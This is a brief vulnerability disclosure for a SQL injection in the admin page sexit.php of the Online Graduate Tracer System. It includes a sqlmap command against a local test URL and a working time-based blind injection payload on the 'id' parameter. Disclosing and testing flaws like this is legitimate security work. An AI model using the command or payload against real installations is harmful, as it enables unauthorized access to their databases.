Online Graduate Tracer System sexit.php sql injection
url:tracking/admin/sexit.php
Abstract:
Line 142 of sexit.php invokes a SQL query built using unvalidated input. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.
Explanation:
SQL injection errors occur when:
Data enters a program from an untrusted source.
The data is used to dynamically construct a SQL query.
In this case the data is passed to mysqli_query() in sexit.php at line 142.
sqlmap.py -u "http://127.0.0.1/shenji/tracking/admin/sexit.php?id=1"
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1550 FROM (SELECT(SLEEP(5)))fOxo) AND 'GLQe'='GLQe
---
Download Code:
https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html